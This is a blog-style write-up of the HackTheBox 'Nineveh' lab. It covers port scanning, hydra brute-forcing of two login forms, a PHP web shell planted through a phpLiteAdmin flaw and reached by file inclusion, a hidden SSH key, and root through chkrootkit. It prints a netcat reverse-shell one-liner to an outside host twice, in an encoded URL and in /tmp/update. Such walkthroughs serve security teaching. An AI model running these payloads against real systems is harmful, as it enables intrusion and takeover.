hackthebox – nineveh – linux

Starting with masscan

# masscan -e tun0 -p1-65535 --rate=1000 10.10.10.43

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-07-06 05:14:39 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 443/tcp on 10.10.10.43                                    
Discovered open port 80/tcp on 10.10.10.43

Two web ports are open with SSL and without SSL.

Lets explore without SSL (port 80) first. To start with we will try gobuster

# gobuster -u http://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.43/
[+] Threads      : 30
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 301,302,307,200,204
=====================================================
/department (Status: 301)

We found one directory /department. Browse it

hackthebox – nineveh – department

Hmm a login page, we can try few login details like admin/admin, guest/guest, admin/password, etc. But in this case none worked. So lets checkout source to see if we find anything interesting.

hackthebox – message from amrois

We see a message from amrois user to admin requesting to fix the login page.

Although amrois is talking about some problem in login page, I am not sure what is wrong with the login page. Therefore, I thought of using hydra against the login page.

The login page gives an error like “Invalid username” and “Invalid password”. This helps to find the right username and password. Quickly I was able to find that the username is admin. For password, I use hydra as following

# hydra -l 'admin' -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid"

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

-- snip --
[DATA] attacking http-post-form://10.10.10.43:80//department/login.php:username=^USER^&password=^PASS^:Invalid
[STATUS] 675.00 tries/min, 675 tries in 00:00h, 0 to do in 01:00h, 14343723 active
[STATUS] 684.00 tries/min, 2052 tries in 00:00h, 0 to do in 03:00h, 14342346 active
[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
-- snip --

We got the password 1q2w3e4r5t.

Login with user admin and above password.

hackthebox – nineveh – department admin

There is only one useful tab called Notes. If we click on it, we see following message.

Have you fixed the login page yet! hardcoded username and password is really bad idea!

check your serect folder to get in! figure it out! this is your challenge

Improve the db interface.
~amrois

Again, message from amrois. He is asking same thing and giving us hint to find the secret folder.

If we look at the URL for Notes, it is http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt . May be we can exploit it with LFI,RFI, etc. We will check it out later.

That’s it for port 80 for now. Lets forget for it now and move to port 443

Using gobuster

# gobuster -u https://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -k

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : https://10.10.10.43/
[+] Threads      : 30
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 307,200,204,301,302
=====================================================
/db (Status: 301)

We got /db folder. Lets browse it

hackthebox – nineveh – phpliteadmin

We see a phpLiteAdmin page. Here we discover the version of phpliteadmin is v1.9 and we also discover the full path because of error line on the top.

Again, using hydra to find the password

# hydra -l '' -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password."

-- snip --
[DATA] attacking http-post-forms://10.10.10.43:443//db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.
[STATUS] 192.00 tries/min, 192 tries in 00:00h, 0 to do in 01:00h, 14344206 active
[STATUS] 185.33 tries/min, 556 tries in 00:00h, 0 to do in 03:00h, 14343842 active
[STATUS] 188.43 tries/min, 1319 tries in 00:00h, 0 to do in 07:00h, 14343079 active
[443][http-post-form] host: 10.10.10.43   password: password123

Nice, we got the password ie password123. Use it and enter

If you check on searchploit then you will see a vulnerability in phpliteadmin v1.9 which allow executing PHP code if we rename database with PHP file extension.

Create a database called ninevehNotes.php and create a table with the following content and TYPE=TEXT. The content of the table is as follows

<?php echo system($_REQUEST["cmd"]); ?>

Now get back to port 80 and use above as following

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls

We got command execution!!

If we go to the following address, we see secure_notes folder, inside it there is a png file ie ninevh.png

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls+../../ssl/

Go to the following address and save the file, use binwalk to see if it conceals any secrets

https://10.10.10.43/secure_notes/
# binwalk -e nineveh.png 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)

we see tar file is there

# cd _nineveh.png.extracted/
# ls
2BF8D0.tar  54  54.zlib  secret
# cd secret/
# ls
nineveh.priv  nineveh.pub

Nice, private and public key.

Lets get a shell. urlencode following

;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f

and use the output with the URL. Make sure to listen for shell in another terminal

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.44%204444%20%3E%2Ftmp%2Ff

We will get a shell. Now we can use the private key we found before. Save it as anything you like, set permission to 400 and SSH

[email protected]:/dev/shm$ chmod 400 a.key 
[email protected]:/dev/shm$ ssh -i a.key [email protected]
Could not create directory '/var/www/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

133 packages can be updated.
66 updates are security updates.


You have mail.
Last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14
[email protected]:~$ whoami
amrois

We are amrois user now.

After getting the amrois user, we need to find the way to root. To do it, I search for files/folders owned by amrois user

[email protected]:~$  find / -user amrois 2> /dev/null
-- snip --
/report
/usr/sbin/report-reset.sh
-- snip --

Among all of the result above seems to be interesting. Checking the /report folder

[email protected]:/report$ ls -lh
total 64K
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:40 report-19-07-06:02:40.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:41 report-19-07-06:02:41.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:42 report-19-07-06:02:42.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:43 report-19-07-06:02:43.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:44 report-19-07-06:02:44.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:45 report-19-07-06:02:45.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:46 report-19-07-06:02:46.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:47 report-19-07-06:02:47.txt

Open one of the file, you will realize that the file is the log of chkrootkit. I then checked if the user is running any cronjob because the above result shows that the script is executing after some interval of time. I assumed that the process is ran by some other user ie root.

There is a known issue with chkrootkit. If we create a file in /tmp directory name update, then chkrootkit with executing it as root if it is running by root user.

To test this I create a file /tmp/update and inserted following

#!/bin/bash

rm /tmp/gf;mkfifo /tmp/gf;cat /tmp/gf|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/gf

Listen for the shell and after sometime you will get a shell

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.43] 59452
bash: cannot set terminal process group (30132): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~# whoami
whoami
root

Lets check if there is any cronjob running by root user

[email protected]:~#  crontab -l
*/1 * * * * /root/vulnScan.sh

Indeed, what is the content?

[email protected]:~# cat /root/vulnScan.sh
cat /root/vulnScan.sh
#!/bin/bash
/usr/bin/chkrootkit > /report/report-`date +%y-%m-%d:%H:%M`.txt
chown amrois:amrois /report/report-`date +%y-%m-%d:%H:%M`.txt

That’s all, but wait…why assuming, chkrootkit might be running with any other user. That’s right. I have assumed it here and it worked. Alternatively, we can check the process every minute using python script or use tool like pspy

Leave a Reply

Your email address will not be published. Required fields are marked *